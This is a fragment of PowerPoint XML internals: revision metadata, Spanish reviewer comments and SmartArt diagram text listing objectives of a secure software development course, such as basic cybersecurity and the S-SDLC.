          <ac:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-02-11T12:24:08.109" v="12715" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2088880639" sldId="468"/>
            <ac:picMk id="1026" creationId="{01C03B96-4290-9A28-D453-F43332B0809A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-02-11T12:24:28.158" v="12719" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2088880639" sldId="468"/>
            <ac:picMk id="1028" creationId="{D5E6617C-427A-0917-481F-BD12185532D3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-02-11T12:25:05.158" v="12723" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2088880639" sldId="468"/>
            <ac:picMk id="1030" creationId="{860FE052-89C3-7E2E-7295-97B23B277C90}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-02-11T12:26:48.542" v="12735" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2088880639" sldId="468"/>
            <ac:picMk id="1032" creationId="{BBE94FA2-5163-5684-5057-89F6DA9D1681}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-01-28T16:03:26.458" v="11558"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2509610780" sldId="469"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-01-26T09:16:23.666" v="11169" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2509610780" sldId="469"/>
            <ac:spMk id="6" creationId="{07B6F43C-3807-920C-3D8A-D985C5875611}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-01-26T09:17:29.387" v="11183" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2509610780" sldId="469"/>
            <ac:spMk id="12" creationId="{08169D76-BDD9-B8DF-1897-F4754CA54B72}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-01-28T16:03:26.458" v="11558"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2509610780" sldId="469"/>
            <ac:picMk id="2" creationId="{DF8F5219-40D5-1A5D-51EA-14A47DBEE619}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-01-26T09:17:23.508" v="11182" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2509610780" sldId="469"/>
            <ac:picMk id="13" creationId="{FE4BC8EF-C8F9-3259-C37D-500061784A1C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-01-28T16:03:31.836" v="11560"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4131207400" sldId="470"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-01-26T09:19:13.898" v="11249" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4131207400" sldId="470"/>
            <ac:spMk id="2" creationId="{162F2F92-F86F-3879-A166-AF424FD14FED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-01-26T09:18:26.339" v="11238" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4131207400" sldId="470"/>
            <ac:spMk id="6" creationId="{13B2D578-70E3-BEF7-32EB-B8B488F72126}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-01-26T09:19:13.898" v="11249" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4131207400" sldId="470"/>
            <ac:picMk id="3" creationId="{E52FC2CD-4EEB-1BB7-AB5D-8F311FC95373}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-01-26T09:19:13.898" v="11249" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4131207400" sldId="470"/>
            <ac:picMk id="4" creationId="{23BB70D0-4FFC-0312-7BC8-C9B114DB92FF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Virginia Urien Real De Asua" userId="49f70246-9f8e-4476-9792-66a5b73c8b00" providerId="ADAL" clId="{A9A5FE3C-EBA6-4F6F-B306-CA0109A91259}" dt="2026-01-28T16:03:31.836" v="11560"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4131207400" sldId="470"/>
            <ac:picMk id="5" creationId="{F6987599-4049-3921-36DC-DC2AD84C402F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData clId="Web-{27041B40-7A62-97B3-288F-8A9F3F7A0294}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="" userId="" providerId="" clId="Web-{27041B40-7A62-97B3-288F-8A9F3F7A0294}" dt="2026-02-02T12:55:00.232" v="4" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="" userId="" providerId="" clId="Web-{27041B40-7A62-97B3-288F-8A9F3F7A0294}" dt="2026-02-02T12:55:00.232" v="4" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4041764312" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="" userId="" providerId="" clId="Web-{27041B40-7A62-97B3-288F-8A9F3F7A0294}" dt="2026-02-02T12:55:00.232" v="4" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4041764312" sldId="256"/>
            <ac:spMk id="14" creationId="{C2EFFAA0-E17C-C1D6-1DCE-5EE2B6E33F94}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Mario Platas Gonzalez" userId="S::mplatas@oesia.com::86e73e16-3f36-4f3f-aa24-e3fd020abf28" providerId="AD" clId="Web-{27041B40-7A62-97B3-288F-8A9F3F7A0294}"/>
    <pc:docChg chg="addSld delSld modSld">
      <pc:chgData name="Mario Platas Gonzalez" userId="S::mplatas@oesia.com::86e73e16-3f36-4f3f-aa24-e3fd020abf28" providerId="AD" clId="Web-{27041B40-7A62-97B3-288F-8A9F3F7A0294}" dt="2026-02-02T12:56:23.518" v="24"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mario Platas Gonzalez" userId="S::mplatas@oesia.com::86e73e16-3f36-4f3f-aa24-e3fd020abf28" providerId="AD" clId="Web-{27041B40-7A62-97B3-288F-8A9F3F7A0294}" dt="2026-02-02T12:55:21.171" v="10"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4041764312" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mario Platas Gonzalez" userId="S::mplatas@oesia.com::86e73e16-3f36-4f3f-aa24-e3fd020abf28" providerId="AD" clId="Web-{27041B40-7A62-97B3-288F-8A9F3F7A0294}" dt="2026-02-02T12:55:21.171" v="10"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4041764312" sldId="256"/>
            <ac:spMk id="14" creationId="{C2EFFAA0-E17C-C1D6-1DCE-5EE2B6E33F94}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Mario Platas Gonzalez" userId="S::mplatas@oesia.com::86e73e16-3f36-4f3f-aa24-e3fd020abf28" providerId="AD" clId="Web-{27041B40-7A62-97B3-288F-8A9F3F7A0294}" dt="2026-02-02T12:56:21.300" v="23"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="926859675" sldId="471"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
</pc:chgInfo>
</file>

<file path=ppt/comments/modernComment_100_F0E86DD8.xml><?xml version="1.0" encoding="utf-8"?>
<p188:cmLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p188="http://schemas.microsoft.com/office/powerpoint/2018/8/main">
  <p188:cm id="{34A74361-F326-4213-B47B-37E28036F196}" authorId="{CA19D7FF-8E5D-ED5C-B80D-FA80DDC1D485}" created="2026-01-22T09:10:50.648">
    <ac:deMkLst xmlns:ac="http://schemas.microsoft.com/office/drawing/2013/main/command">
      <pc:docMk xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command"/>
      <pc:sldMk xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command" cId="4041764312" sldId="256"/>
      <ac:spMk id="5" creationId="{FA564B0A-D13B-2FE1-EAA7-633B2965D160}"/>
    </ac:deMkLst>
    <p188:txBody>
      <a:bodyPr/>
      <a:lstStyle/>
      <a:p>
        <a:r>
          <a:rPr lang="es-ES"/>
          <a:t>Diapositiva 108: generar clase en Socrative</a:t>
        </a:r>
      </a:p>
    </p188:txBody>
  </p188:cm>
</p188:cmLst>
</file>

<file path=ppt/comments/modernComment_12B_18AF9474.xml><?xml version="1.0" encoding="utf-8"?>
<p188:cmLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p188="http://schemas.microsoft.com/office/powerpoint/2018/8/main">
  <p188:cm id="{AEF3035A-6FA0-42A2-94CC-FBB0FE0B4C1F}" authorId="{CA19D7FF-8E5D-ED5C-B80D-FA80DDC1D485}" created="2026-01-21T14:11:00.869">
    <ac:deMkLst xmlns:ac="http://schemas.microsoft.com/office/drawing/2013/main/command">
      <pc:docMk xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command"/>
      <pc:sldMk xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command" cId="414159988" sldId="299"/>
      <ac:spMk id="6" creationId="{4B245D37-473B-E2FE-6766-97458C9280FC}"/>
    </ac:deMkLst>
    <p188:txBody>
      <a:bodyPr/>
      <a:lstStyle/>
      <a:p>
        <a:r>
          <a:rPr lang="es-ES"/>
          <a:t>Sustituidas por algunas noticias actuales. Ídem siguiente diapositiva</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09236-8FFF-4A0A-8C22-5634EDB7807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ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{888997A9-2A5C-46E5-B1E4-EEDD148249BF}">
      <dgm:prSet phldrT="[Texto]" phldr="0" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="004C41"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Adquirir conocimientos y capacidad de aplicación práctica de esos, sobre el control de seguridad en desarrollo de software</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4EF15993-7008-4BDC-BA27-5C728D324FE1}" type="parTrans" cxnId="{D5B62AEB-3978-47C2-8C2A-2926372AB203}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1200">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9A1275F-29C8-4177-A3A1-A3DBB577797B}" type="sibTrans" cxnId="{D5B62AEB-3978-47C2-8C2A-2926372AB203}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1800">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C46D3610-9ADB-4D2B-8AC2-824E2968F6E4}">
      <dgm:prSet phldrT="[Texto]" phldr="0" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="004C41"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Conocimientos básicos de ciberseguridad</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{75C650B5-5209-4F3C-AB2C-D1BA5E966DB8}" type="parTrans" cxnId="{1C65F048-3F26-44FD-9BFB-79C27A5C7F48}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1200">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{467FF3F0-5CAE-44DC-9E51-FAB4451D1C70}" type="sibTrans" cxnId="{1C65F048-3F26-44FD-9BFB-79C27A5C7F48}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1800">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55325809-03EB-4D44-9399-FF6557CD19BF}">
      <dgm:prSet phldrT="[Texto]" phldr="0" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="004C41"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Ciclo de vida de desarrollo de software seguro, S-SDLC.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F5B27F6-3DC6-475F-9948-901D19F9A294}" type="parTrans" cxnId="{82DFA740-6EDC-42B4-9BE5-4DAA0743AA58}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1200">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AE9CC62E-73FE-47DC-A252-7C3D8500F717}" type="sibTrans" cxnId="{82DFA740-6EDC-42B4-9BE5-4DAA0743AA58}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES" sz="1800">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA70C3C4-E60D-4276-BC41-E0ED0B086151}">
      <dgm:prSet phldrT="[Texto]" phldr="0" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="004C41"/>
        </a:solidFill>
        <a:ln w="1905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r>
            <a:rPr lang="es-ES" sz="1600" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Seguridad aplicada a desarrollo, arquitectura y procedimientos</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{281BF24B-CAFD-47BE-BFC5-8B7807FDEBDF}" type="parTrans" cxnId="{D188032C-C99E-4B3D-8D4A-0AE9CECB4896}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{102FDF23-C778-4A3B-8741-3790757527DC}" type="sibTrans" cxnId="{D188032C-C99E-4B3D-8D4A-0AE9CECB4896}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-ES"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" type="pres">
      <dgm:prSet presAssocID="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" presName="outerComposite" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="5"/>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{40DFBBA2-EF30-4055-A07E-7DDBBA599560}" type="pres">
      <dgm:prSet presAssocID="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" presName="dummyMaxCanvas" presStyleCnt="0">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D24FB1E1-6EE7-4BFD-985A-DF43CDAFE9D0}" type="pres">
      <dgm:prSet presAssocID="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" presName="FourNodes_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6AC52CEB-894F-4FB8-A092-F699E7822924}" type="pres">
      <dgm:prSet presAssocID="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" presName="FourNodes_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5CC2FC0A-40CD-45AF-8A5B-922A54027D01}" type="pres">
      <dgm:prSet presAssocID="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" presName="FourNodes_3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8761679A-1F39-471B-AE94-1326C0B49FE3}" type="pres">
      <dgm:prSet presAssocID="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" presName="FourNodes_4" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="1983329" y="3551800"/>
          <a:ext cx="7933316" cy="1001790"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{734B8186-12BB-4FB9-BA17-F2DE2107086B}" type="pres">
      <dgm:prSet presAssocID="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" presName="FourConn_1-2" presStyleLbl="fgAccFollowNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4AB657D8-98DC-4C36-AA87-554FEA157735}" type="pres">
      <dgm:prSet presAssocID="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" presName="FourConn_2-3" presStyleLbl="fgAccFollowNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B273DA3-886F-4839-AC80-101ECB02BA71}" type="pres">
      <dgm:prSet presAssocID="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" presName="FourConn_3-4" presStyleLbl="fgAccFollowNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1A2875EC-C3E8-4737-8D32-B59A9B87F970}" type="pres">
      <dgm:prSet presAssocID="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" presName="FourNodes_1_text" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B067561-16D6-480F-817E-3627BADDBAF6}" type="pres">
      <dgm:prSet presAssocID="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" presName="FourNodes_2_text" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1BCA4712-ACFB-4E04-BD44-9D72A06813FA}" type="pres">
      <dgm:prSet presAssocID="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" presName="FourNodes_3_text" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{24131D59-2CCF-4D2A-B419-0FB8D5FD2AA3}" type="pres">
      <dgm:prSet presAssocID="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" presName="FourNodes_4_text" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{E9E82521-ACB2-4D67-BDED-E37428B0DF7E}" type="presOf" srcId="{CA70C3C4-E60D-4276-BC41-E0ED0B086151}" destId="{8761679A-1F39-471B-AE94-1326C0B49FE3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{D188032C-C99E-4B3D-8D4A-0AE9CECB4896}" srcId="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" destId="{CA70C3C4-E60D-4276-BC41-E0ED0B086151}" srcOrd="3" destOrd="0" parTransId="{281BF24B-CAFD-47BE-BFC5-8B7807FDEBDF}" sibTransId="{102FDF23-C778-4A3B-8741-3790757527DC}"/>
    <dgm:cxn modelId="{2EB2CF37-F07F-4832-80FF-22F7041341CB}" type="presOf" srcId="{467FF3F0-5CAE-44DC-9E51-FAB4451D1C70}" destId="{4AB657D8-98DC-4C36-AA87-554FEA157735}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{82DFA740-6EDC-42B4-9BE5-4DAA0743AA58}" srcId="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" destId="{55325809-03EB-4D44-9399-FF6557CD19BF}" srcOrd="2" destOrd="0" parTransId="{7F5B27F6-3DC6-475F-9948-901D19F9A294}" sibTransId="{AE9CC62E-73FE-47DC-A252-7C3D8500F717}"/>
    <dgm:cxn modelId="{EF8CBB40-0D0F-492B-A244-C8411A71A967}" type="presOf" srcId="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" destId="{39E97AA5-68D9-4C58-90DB-31345422DA6C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{A266025B-9A91-4386-862C-CBA74C2B05F5}" type="presOf" srcId="{55325809-03EB-4D44-9399-FF6557CD19BF}" destId="{1BCA4712-ACFB-4E04-BD44-9D72A06813FA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{1C65F048-3F26-44FD-9BFB-79C27A5C7F48}" srcId="{ACD09236-8FFF-4A0A-8C22-5634EDB7807A}" destId="{C46D3610-9ADB-4D2B-8AC2-824E2968F6E4}" srcOrd="1" destOrd="0" parTransId="{75C650B5-5209-4F3C-AB2C-D1BA5E966DB8}" sibTransId="{467FF3F0-5CAE-44DC-9E51-FAB4451D1C70}"/>
    <dgm:cxn modelId="{F399D06C-0E1F-4E64-9D08-B26DB0708200}" type="presOf" srcId="{AE9CC62E-73FE-47DC-A252-7C3D8500F717}" destId="{4B273DA3-886F-4839-AC80-101ECB02BA71}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{5D2C2978-C897-4AAB-A555-32CC20154B1B}" type="presOf" srcId="{888997A9-2A5C-46E5-B1E4-EEDD148249BF}" destId="{1A2875EC-C3E8-4737-8D32-B59A9B87F970}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
    <dgm:cxn modelId="{3E1B4E59-0235-4CC4-BF30-32938AB468F2}" type="presOf" srcId="{C9A1275F-29C8-4177-A3A1-A3DBB577797B}" destId="{734B8186-12BB-4FB9-BA17-F2DE2107086B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vProcess5"/>
